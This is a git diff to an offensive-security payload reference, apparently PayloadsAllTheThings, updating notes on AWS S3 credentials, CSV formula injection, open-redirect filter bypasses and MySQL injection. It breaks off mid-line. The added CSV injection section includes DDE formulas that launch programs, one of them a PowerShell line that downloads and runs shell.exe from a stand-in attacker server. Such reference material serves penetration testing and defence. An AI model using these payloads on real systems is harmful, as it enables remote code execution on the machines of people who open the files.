diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 0ac413b..34625a0 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -26,7 +26,15 @@ AWSSecretKey=[ENTER HERE YOUR KEY] aws configure --profile nameofprofile ``` -then you can use *--profile nameofprofile* in the aws command +then you can use *--profile nameofprofile* in the aws command. + +Alternatively you can use environment variables instead of creating a profile. + +```bash +export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56 +export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ +export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU= +``` ## Open Bucket @@ -163,4 +171,5 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) -* [FlAWS.cloud Challenge based on AWS vulnerabilities](http://flaws.cloud/) +* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) +* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) diff --git a/CSV injection/README.md b/CSV injection/README.md index 5430482..126105d 100644 --- a/CSV injection/README.md +++ b/CSV injection/README.md @@ -1,4 +1,4 @@ -# CSV Excel formula injection +# CSV Injection (Formula Injection) Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. @@ -9,12 +9,15 @@ Basic exploit with Dynamic Data Exchange ```powershell DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 +=cmd|' /C notepad'!'A1' +=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 ``` Technical Details of the above payload: -cmd is the name the server can respond to whenever a client is trying to access the server -/C calc is the file name which in our case is the calc(i.e the calc.exe) -!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data + +- `cmd` is the name the server can respond to whenever a client is trying to access the server +- `/C` calc is the file name which in our case is the calc(i.e the calc.exe) +- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data Any formula can be started with @@ -29,4 +32,6 @@ Any formula can be started with * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) -* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) \ No newline at end of file +* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) +* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) +* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 57ed61b..f0a3c40 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -16,7 +16,7 @@ * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - * [NTLMv2 hashes relaying](#ntlv2-hashes-relaying) + * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Privilege Escalation](#privilege-escalation) diff --git a/Open redirect/README.md b/Open redirect/README.md index 9ce644f..3630004 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md @@ -48,6 +48,7 @@ Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) Using "%E3%80%82" to bypass "." blacklisted character ```powershell +/?redir=google怂com //google%E3%80%82com ``` diff --git a/SQL injection/Images/wildcard_underscore.jpg b/SQL injection/Images/wildcard_underscore.jpg new file mode 100644 index 0000000..81007e4 Binary files /dev/null and b/SQL injection/Images/wildcard_underscore.jpg differ diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 1d7207d..4974839 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -91,6 +91,14 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO